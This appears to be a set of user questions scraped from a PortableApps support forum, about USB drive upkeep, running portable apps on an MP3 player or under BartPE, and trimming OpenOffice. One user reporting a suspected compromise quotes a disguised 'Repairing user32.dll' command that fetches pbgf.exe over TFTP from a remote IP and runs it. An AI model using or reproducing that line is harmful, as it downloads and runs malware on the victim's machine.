With a lot of use writing/deleting on a hard disk one should defrag regularly. I have started using USB a lot and would be grateful to know what maintenance one should do.
While it is memory used; i imagine that a space is left by a deleted file and space not necessarily used by another. So fragmentation still occurs i would assume and shorten the life of a USB.
thanks
hi all,
i am new to all these. so i need a bit of help. i hv a toshiba gigabeat, 30 gb, which is a windows mobile based mp3 player. i wanted to install portableapps in it. so i extracted it to my desktop and then copied it to my player. but now when i try to open it nothing happens. i jst want to know the cause of the problem and if possible a way to fix it.
thanks.
Dear support:
This may or may not be related to portableapps, but I have to ask and put this out there.
I was installing portableapp for the first time (the full install, not lite). Somewhere towards the end of the install (i.e. 45 minutes later), I noticed some activity happening on my laptop.
Some windows were opening up by themselves. My start menu opened, and this command was placed in the Start - > Run box and was about to be run:
%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 69.157.107.38 GET pbgf.exe & start pbgf&

I'm between computer user and computer nerd (I mean that in the best way possible), so pardon me if this sounds stupid, but can I turn any application into something that doesn't necessitate using system files?
Hey, I looked hi and low for this topic and couldn't find it. What I would like to do, is to be able to boot with bart pe, and run the portable apps off my thumbdrive, but when I try to run them, I get a "OPENGL32.DLL" ERROR. Any possible fixes? Thanks.
Hello everyone.
If I only need OpenOffice's: Writer, Calc, Impress what should I do to leave only these apps in the package?
Thanks.
Is it OK if I repacked PAM with some handy application. I know that PAM is opensource but the logo isn't. So is it legal?
is there a portable apps template available to create a skin for the portable apps menu? I tried looking here:
